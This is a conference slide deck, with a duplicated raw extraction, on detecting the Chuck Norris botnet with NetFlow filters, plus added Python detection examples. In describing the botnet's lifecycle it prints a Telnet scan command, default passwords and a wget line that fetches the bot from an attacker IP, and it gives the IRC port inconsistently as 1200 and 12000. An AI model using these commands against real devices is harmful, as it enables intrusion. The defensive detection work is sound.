Detecting Botnets with NetFlow
V. Krmíček, T. Plesník, {vojtec|plesnik}@ics.muni.cz
FloCon 2011, January 12, Salt Lake City, Utah
Presentation Outline
- NetFlow Monitoring at MU
- Chuck Norris Botnet in a Nutshell
- Botnet Detection Methods
- NfSen Botnet Detection Plugin
- Conclusion
Krmíček, Plesník: Detecting Botnets with NetFlow (slide 2/28)
Part I
NetFlow Monitoring at MU
Masaryk University, Brno, Czech Republic
- 9 faculties, 200 departments and institutes
- 48 000 students and employees
- 15 000 networked hosts
- 2x 10 gigabit uplinks to CESNET

Average traffic volume at the edge links in peak hours:
Interval | Flows | Packets | Bytes
Second   | 5 k   | 150 k   | 132 M
Minute   | 300 k | 9 M     | 8 G
Hour     | 15 M  | 522 M   | 448 G
Day      | 285 M | 9.4 G   | 8 T
Week     | 1.6 G | 57 G    | 50 T

[chart: Number of Flows in MU Network (5-minute window), Monday to Sunday, y-axis 0 to 1 500 000 flows]
FlowMon Probes at Masaryk University Campus
[map: placement of the FlowMon probes and NetFlow collectors on the campus network]
NetFlow Monitoring at Masaryk University
- NetFlow data generation: FlowMon probes on the monitored links
- NetFlow data collection: NetFlow v5/v9 records exported to the NetFlow collector
- NetFlow data analyses: SPAM detection, worm/virus detection, intrusion detection
- Incident reporting over HTTP, syslog and e-mail: WWW front end, syslog server, mailbox
From NetFlow Monitoring to Botnet Discovery
Network Behaviour Analysis at MU
- Identifies malware from NetFlow data
- Watches what's happening inside the network 24/7
- Single-purpose detection patterns (scanning, botnets, ...)
- Complex models of the network behaviour
Even Chuck Norris Can't Resist NetFlow Monitoring
- Unusual worldwide TELNET scan attempts
- Mostly coming from ADSL connections
- New botnet, Chuck Norris, discovered in December 2009
- Detailed analysis followed
Part II
Chuck Norris Botnet in a Nutshell
Chuck Norris Botnet
- Linux malware – IRC bots with central C&C servers
- Attacks poorly configured Linux MIPSEL devices
- Vulnerable devices – ADSL modems and routers
- Uses a TELNET brute-force attack for infection
- Users are not aware of the malicious activities
- No anti-malware solution exists to detect it
Discovered at Masaryk University on 2 December 2009. The malware got the Chuck Norris moniker from a comment in its source code: "[R]anger Killato: in nome di Chuck Norris".
Botnet Lifecycle
1. Scanning for vulnerable devices in predefined networks
   - IP prefixes of ADSL networks of worldwide operators
   - network scanning – pnscan -n30 88.102.106.0/24 23
2. Infection of a vulnerable device
   - TELNET dictionary attack – 15 default passwords
   - admin, password, root, 1234, dreambox, blank password, ...
3. IRC bot initialization
   - IRC bot download and execution on the infected device: wget http://87.98.163.86/pwn/syslgd
4. Botnet C&C operations
   - further bot spreading and C&C command execution
   - DNS spoofing and denial-of-service attacks
More about Chuck Norris Botnet
The Chuck Norris botnet lifecycle in detail and further information are available at the CYBER project page:
http://www.muni.cz/ics/cyber/chuck_norris_botnet
[diagram: the bot on the infected device (1) joins the soldiers channel on the C&C (IRC) server, (2) reads the channel topic init-cmd (get scan-tools), (3) fetches the scan-tools from the web server with wget; the bot also stops remote access to the device (ports 22-80)]
Part III
Botnet Detection Methods
Detection Methods Overview
Five Detection Methods
- Telnet scan detection
- Connections to botnet distribution sites detection
- Connections to botnet C&C centers detection
- DNS spoofing attack detection
- ADSL string detection
Methods Correspond to the Botnet Lifecycle
Applied to NetFlow Data
- Defined as NFDUMP filters
- Implemented in the NfSen collector
Telnet Scan Detection – Phase I
Incoming and outgoing TCP SYN scans on port 23
[diagram: infected device, local network, a list of C-class networks to scan (147.251.3.x, 147.251.18.x, 147.251.20.x, 147.251.4.x), hosts in 196.142.8.x and 214.128.3.x, TCP/23 connections carrying SYN or SYN+RESET flags]
NFDUMP detection filter:
(net local_network) and (dst port 23) and (proto TCP) and ((flags S and not flags ARPUF) or (flags SR and not flags APUF))
Connections to Botnet Distribution Sites – Phase II
Bot's web download requests from an infected host
[diagram: infected device in the local network connecting to the botnet distribution web servers on TCP/80, flows carrying SYN+ACK flags]
NFDUMP detection filter:
(src net local_network) and (dst ip web_servers[1]) and (dst port 80) and (proto TCP) and (flags SA and not flag R)
[1] IP addresses of the attacker's botnet distribution web servers
Connections to Botnet C&C Center – Phase III
Bot's IRC traffic with the command and control center
[diagram: infected device in the local network connecting to the botnet C&C server on TCP/1200, flows carrying SYN+ACK flags]
NFDUMP detection filter:
(src net local_network) and (dst ip IRC_server[2]) and (dst port 1200) and (proto TCP) and (flags SA and not flag R)
[2] IP address of the attacker's IRC server (botnet C&C center)
DNS Spoofing Attack Detection – Phase IV
Attacker's DNS or OpenDNS Queries
- Common DNS requests forwarded to OpenDNS servers
- Targeted DNS requests forwarded to the attacker's spoofed DNS
DNS Queries Outside the Local Network
Used for Phishing Attacks
- e.g. Facebook or banking sites
[diagram: infected device in the local network sending UDP/53 queries to an OpenDNS server and to the spoofed DNS server]
NFDUMP detection filter:
(src net local_network) and ((dst ip OpenDNS_servers[3]) or (dst ip DNS_servers[4])) and (proto UDP) and (dst port 53)
[3] IP addresses of the common OpenDNS servers
[4] IP addresses of the attacker's spoofed DNS servers
ADSL String Detection
Looking for the ADSL String
- The ADSL string indicates the Chuck Norris botnet
- Searched for in the victim's hostname or the victim's WHOIS record
- Querying the DNS server and parsing the received hostname
- Querying the WHOIS database and parsing the received info
[screenshot: WHOIS/DNS lookup output for a detected host, with the "adsl" string highlighted]
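The fifth method, as an added example that is not the plugin's own Perl code: the hostname returned by a reverse-DNS lookup and the attributes of a WHOIS record are searched for the "adsl" indicator the slide describes. The lookups are passed in as callables, the PTR names and WHOIS texts below are constructed, and the list of WHOIS attributes inspected (RIPE-style "key: value" records) is an assumption about the record layout, not something the slides state.

```python
"""ADSL string detection (the fifth method) over reverse DNS and WHOIS data.
Added example, not the plugin's Perl code: the hostname from a reverse-DNS
lookup and the fields of a WHOIS record are searched for "adsl", the string
the slides use as an indicator of the ADSL devices this botnet infects.
Lookups are passed in as callables so the example runs offline on constructed data."""
from dataclasses import dataclass, field
from typing import Callable, List, Optional

INDICATOR = "adsl"
# WHOIS attributes worth inspecting; assumes RIPE-style "key: value" records.
WHOIS_FIELDS = ("inetnum", "netname", "descr", "org-name", "remarks")


@dataclass
class AdslVerdict:
    ip: str
    hostname: Optional[str]
    evidence: List[str] = field(default_factory=list)

    @property
    def matched(self) -> bool:
        return bool(self.evidence)


def parse_whois(text: str) -> dict:
    """Collect 'key: value' lines into {key: [values]}; '%' and '#' lines are comments."""
    fields = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line[0] in "%#":
            continue
        key, sep, value = line.partition(":")
        if sep:
            fields.setdefault(key.strip().lower(), []).append(value.strip())
    return fields


def check_adsl(ip: str, reverse_lookup: Callable[[str], Optional[str]],
               whois_lookup: Callable[[str], str]) -> AdslVerdict:
    """Return the verdict together with every place the indicator was found."""
    verdict = AdslVerdict(ip=ip, hostname=reverse_lookup(ip))
    if verdict.hostname and INDICATOR in verdict.hostname.lower():
        verdict.evidence.append(f"hostname: {verdict.hostname}")
    whois = parse_whois(whois_lookup(ip) or "")
    for key in WHOIS_FIELDS:
        for value in whois.get(key, []):
            if INDICATOR in value.lower():
                verdict.evidence.append(f"whois {key}: {value}")
    return verdict


# Constructed lookup tables standing in for PTR queries and WHOIS responses.
FAKE_PTR = {
    "203.0.113.17": "17.113.0.203.adsl-pool.example.net",
    "203.0.113.40": "srv40.example.org",
    "203.0.113.55": "host55.example.org",
}
FAKE_WHOIS = {
    "203.0.113.17": "% constructed record\ninetnum: 203.0.113.0 - 203.0.113.31\n"
                    "netname: EXAMPLE-ADSL-POOL\ndescr: Example Telecom ADSL customers\n",
    "203.0.113.40": "inetnum: 203.0.113.32 - 203.0.113.47\nnetname: EXAMPLE-HOSTING\n"
                    "descr: Example Hosting servers\n",
    "203.0.113.55": "inetnum: 203.0.113.48 - 203.0.113.63\nnetname: EXAMPLE-NET\n"
                    "descr: Dynamic pool for ADSL subscribers\n",
}


def fake_reverse_lookup(ip): return FAKE_PTR.get(ip)
def fake_whois_lookup(ip): return FAKE_WHOIS.get(ip, "")


if __name__ == "__main__":
    for ip in FAKE_PTR:
        v = check_adsl(ip, fake_reverse_lookup, fake_whois_lookup)
        print(ip, "ADSL indicator" if v.matched else "no indicator", v.evidence)
```

In a live deployment the two callables would wrap `socket.gethostbyaddr(ip)[0]` for the PTR name and a plain TCP port 43 WHOIS query; keeping them injectable is what lets the matching logic be tested without network access. The third constructed host shows the case the slide's two-source design is for: a hostname that says nothing, while the WHOIS description still carries the indicator.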
Detected Chuck Norris Servers
Known IP Addresses
- Web server addresses: 87.98.173.190, 87.98.163.86
- IRC server addresses: 87.98.173.190, 87.98.163.86
- IRC server port: 12000
- OpenDNS server addresses: 208.67.222.222, 208.67.220.220
- Spoofed DNS server: 87.98.163.86
This data is used in the detection methods by default.
IP address updates are published at the project page.
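The four NFDUMP filters of Phases I to IV, re-expressed as Python predicates and run over flow records, as an added example that is not the authors' NfSen plugin code. The server addresses are the defaults from the known-addresses list above; the local prefix 147.251.0.0/16, the simplified CSV record layout and the sample flows are constructed assumptions, and the per-source fan-out count at the end is an added aggregation the slides do not describe.

```python
"""Chuck Norris botnet detection, Phases I-IV, re-expressed as Python predicates.
Added example (not the authors' NfSen plugin code): each NFDUMP filter from the
slides becomes a function over one flow record; all four run over constructed
nfdump-style records so the address and TCP-flag logic can be checked offline."""
from collections import defaultdict
from dataclasses import dataclass
from ipaddress import ip_address, ip_network

# Default addresses from the "Detected Chuck Norris Servers" slide.
WEB_SERVERS = {"87.98.173.190", "87.98.163.86"}       # botnet distribution web servers
IRC_SERVERS = {"87.98.173.190", "87.98.163.86"}       # botnet C&C (IRC) servers
IRC_PORT = 1200   # value from the Phase III filter; the servers slide lists 12000
OPENDNS_SERVERS = {"208.67.222.222", "208.67.220.220"}
SPOOFED_DNS_SERVERS = {"87.98.163.86"}
# Assumption: the monitored campus prefix (the slides draw 147.251.x.x subnets).
LOCAL_NETWORK = ip_network("147.251.0.0/16")

@dataclass(frozen=True)
class Flow:
    src: str
    sport: int
    dst: str
    dport: int
    proto: str   # "TCP" or "UDP"
    flags: str   # cumulative TCP flags seen in the flow, e.g. "SAPF"; "" for UDP

def parse_flow(line):
    """Parse one record of the constructed CSV layout: src,sport,dst,dport,proto,flags."""
    src, sport, dst, dport, proto, flags = [x.strip() for x in line.split(",")]
    return Flow(src, int(sport), dst, int(dport), proto.upper(),
                "" if flags == "-" else flags.upper())

# 'flags S' in the filter: every listed bit is set; 'not flags ARPUF': none of them is.
def flags_set(f, bits): return all(b in f.flags for b in bits)
def flags_clear(f, bits): return not any(b in f.flags for b in bits)
def in_local(addr): return ip_address(addr) in LOCAL_NETWORK

def telnet_scan(f):
    # Phase I: (net local_network) and (dst port 23) and (proto TCP) and
    # ((flags S and not flags ARPUF) or (flags SR and not flags APUF))
    return ((in_local(f.src) or in_local(f.dst)) and f.dport == 23 and f.proto == "TCP"
            and ((flags_set(f, "S") and flags_clear(f, "ARPUF"))
                 or (flags_set(f, "SR") and flags_clear(f, "APUF"))))

def distribution_site(f):
    # Phase II: (src net local_network) and (dst ip web_servers) and (dst port 80)
    # and (proto TCP) and (flags SA and not flag R)
    return (in_local(f.src) and f.dst in WEB_SERVERS and f.dport == 80
            and f.proto == "TCP" and flags_set(f, "SA") and flags_clear(f, "R"))

def cc_center(f):
    # Phase III: the Phase II shape against the IRC C&C server and its port
    return (in_local(f.src) and f.dst in IRC_SERVERS and f.dport == IRC_PORT
            and f.proto == "TCP" and flags_set(f, "SA") and flags_clear(f, "R"))

def dns_spoofing(f):
    # Phase IV: (src net local_network) and ((dst ip OpenDNS) or (dst ip spoofed DNS))
    # and (proto UDP) and (dst port 53)
    return (in_local(f.src) and f.dst in (OPENDNS_SERVERS | SPOOFED_DNS_SERVERS)
            and f.proto == "UDP" and f.dport == 53)

METHODS = {"telnet_scan": telnet_scan, "distribution_site": distribution_site,
           "cc_center": cc_center, "dns_spoofing": dns_spoofing}

def run_detection(lines):
    """Apply every method to every record; returns {method: [(src, dst), ...]}."""
    hits = {name: [] for name in METHODS}
    for line in lines:
        if not line.strip() or line.startswith("#"):
            continue
        f = parse_flow(line)
        for name, predicate in METHODS.items():
            if predicate(f):
                hits[name].append((f.src, f.dst))
    return hits

def telnet_targets_per_source(lines):
    """Distinct port-23 targets per local source among Phase I hits (an added
    aggregation, not on the slides): high fan-out is what a scanner looks like."""
    targets = defaultdict(set)
    for src, dst in run_detection(lines)["telnet_scan"]:
        if in_local(src):
            targets[src].add(dst)
    return {src: len(dsts) for src, dsts in targets.items()}

# Constructed sample records (src,sport,dst,dport,proto,flags); not real traffic.
SAMPLE_FLOWS = """\
147.251.3.10,40001,196.142.8.5,23,TCP,S
147.251.3.10,40002,196.142.8.6,23,TCP,S
214.128.3.7,51000,147.251.4.20,23,TCP,SR
147.251.3.10,40100,87.98.163.86,80,TCP,SAPF
147.251.3.10,40101,87.98.173.190,1200,TCP,SA
147.251.3.10,40102,208.67.222.222,53,UDP,-
147.251.3.11,40200,87.98.163.86,53,UDP,-
147.251.5.2,40300,198.51.100.10,80,TCP,SAPF
147.251.5.2,40301,147.251.8.1,23,TCP,SAPF
147.251.5.3,40302,87.98.163.86,80,TCP,SAR
10.0.0.5,40400,198.51.100.10,23,TCP,S
""".splitlines()

if __name__ == "__main__":
    print(run_detection(SAMPLE_FLOWS))
    print(telnet_targets_per_source(SAMPLE_FLOWS))
```

Two of the constructed records exist to show what the flag clauses exclude: a full TCP/23 session from 147.251.5.2 (flags SAPF) is not a scan, because ACK is set, and a reset connection to a distribution server (flags SAR) is dropped by "not flag R". The remaining records each trigger exactly one phase, and the fan-out count reports that 147.251.3.10 touched two distinct Telnet targets, which is the kind of per-source threshold a plugin would alert on.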
Part IV
NfSen Botnet Detection Plugin
Botnet Detection Plugin
Plugin Features
- Detects Chuck Norris-like botnet behaviour
- Based on NetFlow and other network data sources
- Processes data regularly and provides real-time output
Plugin Architecture
- Compliant with the NfSen plugin architecture recommendations
- PHP frontend with a Perl backend and a PostgreSQL DB
- Web, e-mail and syslog detection output and reporting
Plugin Architecture
[diagram: BACKEND – cndet.pm and cndetdb.pm, reading NetFlow data, DNS and the WHOIS db and storing results in PostgreSQL; FRONTEND – cndet.php, connected to the backend through the nfsend communication interface]
Plugin Methods Architecture
Data sources: NetFlow data, DNS, WHOIS db; results stored in PostgreSQL through cndetdb.pm
Detection methods:
- Telnet scan detection
- Botnet distribution sites detection
- Botnet C&C centers detection
- DNS spoofing attack detection
- ADSL string detection
Web Interface – Infected Host Detected
[screenshot: plugin web interface listing a detected infected host]
Part V
Conclusion
Detection Plugin and Other Botnets
Botnet Lifecycle Similar for the Majority of Botnets
- scanning for possible bots
- infection of a vulnerable device
- bot initialization/update
- botnet operation
Botnet Detection Plugin Customization
- modular plugin engine
- easy modification for detection of other botnets
- the detection methods need to be customized
- plugin distributed under the BSD license
Conclusion
Network Devices Are Not Protected
- Routers, access points, printers, cameras, TVs, ...
- No AV software, missing patches and firmware updates
- But they should be protected
Experience
- NetFlow can monitor all such devices in the network
- Discovery of the new Chuck Norris botnet using NetFlow
- Developed a specialized NfSen plugin for Chuck Norris botnet detection
Future
- Chuck Norris is down, but others are coming (e.g. Stuxnet)
- We are open to research collaboration
- The detection plugin is available at our project site
Thank You For Your Attention
Vojtěch Krmíček, Tomáš Plesník, {vojtec|plesnik}@ics.muni.cz
Project CYBER: http://www.muni.cz/ics/cyber
Detecting Botnets with NetFlow
This material is based upon work supported by the Czech Ministry of Defence under Contract No. OVMASUN200801.
Presentation Outline
NetFlow Monitoring at MU
Chuck Norris Botnet in a Nutshell
Botnet Detection Methods
NfSen Botnet Detection Plugin
Conclusion
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 2 28
Part I
NetFlow Monitoring at MU
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 3 28
Masaryk University Brno Czech Republic
9 faculties 200 departments and institutes48 000 students and employees15 000 networked hosts2x 10 gigabit uplinks to CESNET
Interval Flows Packets Bytes
Second 5 k 150 k 132 MMinute 300 k 9 M 8 GHour 15 M 522 M 448 GDay 285 M 94 G 8 TWeek 16 G 57 G 50 T
Average traffic volume at the edgelinks in peak hours
0
500000
1000000
1500000
Mon Tue Wed Thu Fri Sat Sun
Number of Flows in MU Network (5-minute Window)
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 4 28
FlowMon Probes at Masaryk University Campus
FlowMon probes NetFlow collectors
256
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 5 28
NetFlow Monitoring at Masaryk University
FlowMon
probe
FlowMon
probe
FlowMon
probe
NetFlowdata
generation
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 6 28
NetFlow Monitoring at Masaryk University
FlowMon
probe
FlowMon
probe
FlowMon
probe
NetFlowdata
generation
NetFlow
collector
NetFlow
v5v9
NetFlowdata
collection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 6 28
NetFlow Monitoring at Masaryk University
FlowMon
probe
FlowMon
probe
FlowMon
probe
NetFlowdata
generation
NetFlow
collector
NetFlow
v5v9
NetFlowdata
collection
NetFlowdata
analyses
SPAM
detection
wormvirus
detection
intrusion
detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 6 28
NetFlow Monitoring at Masaryk University
FlowMon
probe
FlowMon
probe
FlowMon
probe
NetFlowdata
generation
NetFlow
collector
NetFlow
v5v9
NetFlowdata
collection
NetFlowdata
analyses
SPAM
detection
wormvirus
detection
intrusion
detection
http
syslog
incident
reporting
mailbox
WWW
syslog
server
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 6 28
From NetFlow Monitoring to Botnet Discovery
Network Behaviour Analysis at MU
Identifies malware from NetFlow dataWatch whatrsquos happening inside the network 247Single purpose detection patterns (scanning botnets )Complex models of the network behavior
Even Chuck Norris Canrsquot Resist NetFlow Monitoring
Unusual worldwide TELNET scan attemptsMostly comming from ADSL connectionsNew botnet Chuck Norris discovered at December 2009Detailed analysis followed
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 7 28
Part II
Chuck Norris Botnet in a Nutshell
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 8 28
Chuck Norris Botnet
Linux malware ndash IRC bots with central CampC serversAttacks poorly-configured Linux MIPSEL devicesVulnerable devices ndash ADSL modems and routers
Uses TELNET brute force attack for infectionUsers are not aware about the malicious activitiesMissing anti-malware solution to detect it
Discovered at Masaryk University on 2 December 2009 The malware got the ChuckNorris moniker from a comment in its source code [R]anger Killato in nomedi Chuck Norris
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 9 28
Botnet Lifecycle
Scanning for vulnerable devices in predefined networksIP prefixes of ADSL networks of worldwide operatorsnetwork scanning ndash pnscan -n30 88102106024 23
Infection of a vulnerable deviceTELNET dictionary attack ndash 15 default passwordsadmin password root 1234 dreambox blank password
IRC bot initializationIRC bot download and execution on infected device wget http879816386pwnsyslgd
Botnet CampC operationsfurther bots spreading and CampC commands executionDNS spoofing and denial-of-service attacks
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 10 28
More about Chuck Norris Botnet
Chuck Norris botnet lifecycle in details and furtherinformation are available at the CYBER project page
httpwwwmuniczicscyberchuck_norris_botnet
3 wget scan-tools
webserver
2 Topic init-cmd (get scan-tools)
1 join soldiersCampC(IRC)serverSTOP
bot
stop remote access(ports 22-80)
infecteddevice
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 11 28
Part III
Botnet Detection Methods
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 12 28
Detection Methods Overview
Five Detection Methods
Telnet scan detectionConnections to botnet distribution sites detectionConnections to botnet CampC centers detectionDNS spoofing attack detectionADSL string detection
Methods Correspond to Botnet Lifecycle
Applied to NetFlow Data
Defined as NFDUMP filtersImplemented to NfSen collector
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 13 28
Telnet Scan Detection ndash Phase I
Incoming and outgoing TCP SYN scans on port 23
infecteddevice
NFDUMP detection filter
(net local_network) and (dst port 23) and (proto TCP) and((flags S and not flags ARPUF) or (flags SR and not flags APUF))
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 14 28
Telnet Scan Detection ndash Phase I
Incoming and outgoing TCP SYN scans on port 23
infecteddevice
localnetwork
NFDUMP detection filter(net local_network)
and (dst port 23) and (proto TCP) and((flags S and not flags ARPUF) or (flags SR and not flags APUF))
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 14 28
Telnet Scan Detection ndash Phase I
Incoming and outgoing TCP SYN scans on port 23
infecteddevice
localnetwork
list of C classnetworks to scan
1472513x14725118x
14725120x
1472514x
NFDUMP detection filter(net local_network)
and (dst port 23) and (proto TCP) and((flags S and not flags ARPUF) or (flags SR and not flags APUF))
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 14 28
Telnet Scan Detection ndash Phase I
Incoming and outgoing TCP SYN scans on port 23
infecteddevice
localnetwork
list of C classnetworks to scan
1472513x14725118x
14725120x
1472514x
TCP23
NFDUMP detection filter(net local_network) and (dst port 23) and (proto TCP)
and((flags S and not flags ARPUF) or (flags SR and not flags APUF))
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 14 28
Telnet Scan Detection ndash Phase I
Incoming and outgoing TCP SYN scans on port 23
infecteddevice
localnetwork
list of C classnetworks to scan
1472513x14725118x
14725120x
1472514x
TCP23
1961428x
2141283x
NFDUMP detection filter(net local_network) and (dst port 23) and (proto TCP)
and((flags S and not flags ARPUF) or (flags SR and not flags APUF))
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 14 28
Telnet Scan Detection ndash Phase I
Incoming and outgoing TCP SYN scans on port 23
infecteddevice
localnetwork
list of C classnetworks to scan
1472513x14725118x
14725120x
1472514x
TCP23
1961428x
2141283x
SYNRESET flags
NFDUMP detection filter(net local_network) and (dst port 23) and (proto TCP) and
((flags S and not flags ARPUF) or (flags SR and not flags APUF))
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 14 28
Connections to Botnet Distribution Sites ndash Phase II
Botrsquos web download requests from infected host
localnetwork
NFDUMP detection filter
(src net local_network) and (dst ip web_servers1) and(dst port 80) and (proto TCP) and (flags SA and not flag R)
1IP addresses of attackerrsquos botnet distribution web serversKrmiacuteček Plesniacutek Detecting Botnets with NetFlow 15 28
Connections to Botnet Distribution Sites ndash Phase II
Botrsquos web download requests from infected host
localnetwork
infecteddevice
NFDUMP detection filter(src net local_network)
and (dst ip web_servers1) and(dst port 80) and (proto TCP) and (flags SA and not flag R)
1IP addresses of attackerrsquos botnet distribution web serversKrmiacuteček Plesniacutek Detecting Botnets with NetFlow 15 28
Connections to Botnet Distribution Sites ndash Phase II
Botrsquos web download requests from infected host
localnetwork
infecteddevice
botnetdistributionweb server
botnetdistributionweb server
botnetdistributionweb server
NFDUMP detection filter(src net local_network) and (dst ip web_servers1)
and(dst port 80) and (proto TCP) and (flags SA and not flag R)
1IP addresses of attackerrsquos botnet distribution web serversKrmiacuteček Plesniacutek Detecting Botnets with NetFlow 15 28
Connections to Botnet Distribution Sites ndash Phase II
Botrsquos web download requests from infected host
localnetwork
infecteddevice
botnetdistributionweb server
botnetdistributionweb server
botnetdistributionweb server
TCP80
NFDUMP detection filter(src net local_network) and (dst ip web_servers1) and
(dst port 80) and (proto TCP)
and (flags SA and not flag R)
1IP addresses of attackerrsquos botnet distribution web serversKrmiacuteček Plesniacutek Detecting Botnets with NetFlow 15 28
Connections to Botnet Distribution Sites ndash Phase II
Botrsquos web download requests from infected host
localnetwork
infecteddevice
botnetdistributionweb server
botnetdistributionweb server
botnetdistributionweb server
TCP80SYNACK flags
NFDUMP detection filter(src net local_network) and (dst ip web_servers1) and
(dst port 80) and (proto TCP) and (flags SA and not flag R)
1IP addresses of attackerrsquos botnet distribution web serversKrmiacuteček Plesniacutek Detecting Botnets with NetFlow 15 28
Connections to Botnet CampC Center ndash Phase III
Botrsquos IRC traffic with command and control center
localnetwork
NFDUMP detection filter
(src net local_network) and (dst ip IRC_server 2) and(dst port 1200) and (proto TCP) and (flags SA and not flag R)
2IP address of an attackerrsquos IRC server (Botnet CampC center)Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 16 28
Connections to Botnet CampC Center ndash Phase III
Botrsquos IRC traffic with command and control center
localnetwork
infecteddevice
NFDUMP detection filter(src net local_network)
and (dst ip IRC_server 2) and(dst port 1200) and (proto TCP) and (flags SA and not flag R)
2IP address of an attackerrsquos IRC server (Botnet CampC center)Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 16 28
Connections to Botnet CampC Center ndash Phase III
Botrsquos IRC traffic with command and control center
localnetwork
infecteddevice
botnetCampCserver
NFDUMP detection filter(src net local_network) and (dst ip IRC_server 2)
and(dst port 1200) and (proto TCP) and (flags SA and not flag R)
2IP address of an attackerrsquos IRC server (Botnet CampC center)Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 16 28
Connections to Botnet CampC Center ndash Phase III
Botrsquos IRC traffic with command and control center
localnetwork
infecteddevice
botnetCampCserver
TCP1200
NFDUMP detection filter(src net local_network) and (dst ip IRC_server 2) and
(dst port 1200) and (proto TCP)
and (flags SA and not flag R)
2IP address of an attackerrsquos IRC server (Botnet CampC center)Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 16 28
Connections to Botnet CampC Center ndash Phase III
Botrsquos IRC traffic with command and control center
localnetwork
infecteddevice
botnetCampCserver
TCP1200SYNACK flags
NFDUMP detection filter(src net local_network) and (dst ip IRC_server 2) and
(dst port 1200) and (proto TCP) and (flags SA and not flag R)
2IP address of an attackerrsquos IRC server (Botnet CampC center)Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 16 28
DNS Spoofing Attack Detection – Phase IV
Attacker's DNS or OpenDNS Queries
- Common DNS requests forwarded to OpenDNS servers
- Targeted DNS requests forwarded to attacker's spoofed DNS
DNS Queries Outside Local Network
- Used for phishing attacks
- E.g. Facebook or banking sites
[Diagram: infected device in the local network sends UDP/53 queries to an OpenDNS server and to the spoofed DNS server]
NFDUMP detection filter:
  (src net local_network) and ((dst ip OpenDNS_servers³) or (dst ip DNS_servers⁴)) and (proto UDP) and (dst port 53)
³ IP addresses of common OpenDNS servers
⁴ IP addresses of the attacker's spoofed DNS servers
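The Phase III and Phase IV filters above are nfdump filter expressions with placeholders (local_network, IRC_server, OpenDNS_servers, DNS_servers). The block below is an added example, not the authors' plugin code: it applies the same predicates to constructed flow records so the flag logic (SYN+ACK present, RST absent) and the address-list matching can be checked offline, and it materializes the two filters as nfdump filter strings from the address lists. The record layout, the local network 192.0.2.0/24, the C&C address 198.51.100.7 and the spoofed DNS address 198.51.100.53 are assumptions; the OpenDNS addresses and the IRC port 12000 are taken from the deck's "Known IP Addresses" slide (the Phase III filter text shows port 1200, so set IRC_PORT to whatever your address list specifies).

```python
"""Phase III (C&C) and Phase IV (DNS spoofing) detection logic over constructed flow records.

Added example, not the NfSen plugin's own code. Addresses marked 'assumption'
and all sample records are constructed; OpenDNS addresses and the IRC port
come from the deck's "Known IP Addresses" slide.
"""
from dataclasses import dataclass
from ipaddress import IPv4Address, ip_address, ip_network
from typing import FrozenSet, Iterable, List, Tuple

LOCAL_NET = ip_network("192.0.2.0/24")                    # assumption: local_network placeholder
IRC_SERVERS = {ip_address("198.51.100.7")}                 # assumption: IRC_server placeholder
IRC_PORT = 12000                                           # "IRC server port" from the deck
OPENDNS_SERVERS = {ip_address("208.67.222.222"),           # OpenDNS addresses from the deck
                   ip_address("208.67.220.220")}
SPOOFED_DNS = {ip_address("198.51.100.53")}                # assumption: DNS_servers placeholder


@dataclass(frozen=True)
class Flow:
    proto: str
    src: IPv4Address
    sport: int
    dst: IPv4Address
    dport: int
    flags: FrozenSet[str]   # TCP flag letters taken from an nfdump-style UAPRSF column


def parse_flow(line: str) -> Flow:
    """Parse one constructed record: proto,src,sport,dst,dport,flags (flags like '.AP.S.')."""
    proto, src, sport, dst, dport, flags = line.strip().split(",")
    return Flow(proto.upper(), ip_address(src), int(sport), ip_address(dst), int(dport),
                frozenset(c for c in flags if c != "."))


def phase3_cnc(f: Flow) -> bool:
    """(src net local) and (dst ip IRC_server) and (dst port IRC_PORT) and (proto TCP)
    and (flags SA and not flags R): an established bot-to-C&C session, not a refused one."""
    return (f.src in LOCAL_NET and f.dst in IRC_SERVERS and f.dport == IRC_PORT
            and f.proto == "TCP" and {"S", "A"} <= f.flags and "R" not in f.flags)


def phase4_dns(f: Flow) -> bool:
    """(src net local) and (dst ip OpenDNS or spoofed DNS) and (proto UDP) and (dst port 53)."""
    return (f.src in LOCAL_NET and (f.dst in OPENDNS_SERVERS or f.dst in SPOOFED_DNS)
            and f.proto == "UDP" and f.dport == 53)


def detect(lines: Iterable[str]) -> List[Tuple[str, str, str]]:
    """Run both predicates over text records; return (method, src, dst) hits in input order."""
    hits: List[Tuple[str, str, str]] = []
    for line in lines:
        if not line.strip() or line.startswith("#"):
            continue
        f = parse_flow(line)
        if phase3_cnc(f):
            hits.append(("phase3-cnc", str(f.src), str(f.dst)))
        if phase4_dns(f):
            hits.append(("phase4-dns", str(f.src), str(f.dst)))
    return hits


def nfdump_filter_phase3() -> str:
    """Materialize the deck's Phase III filter; the IRC_server placeholder becomes an 'or' chain."""
    dst = " or ".join(f"dst ip {ip}" for ip in sorted(IRC_SERVERS, key=int))
    return (f"(src net {LOCAL_NET}) and ({dst}) and (dst port {IRC_PORT}) "
            f"and (proto TCP) and (flags SA and not flags R)")


def nfdump_filter_phase4() -> str:
    """Materialize the deck's Phase IV filter from the OpenDNS and spoofed-DNS lists."""
    dns = " or ".join(f"dst ip {ip}" for ip in sorted(OPENDNS_SERVERS | SPOOFED_DNS, key=int))
    return f"(src net {LOCAL_NET}) and ({dns}) and (proto UDP) and (dst port 53)"


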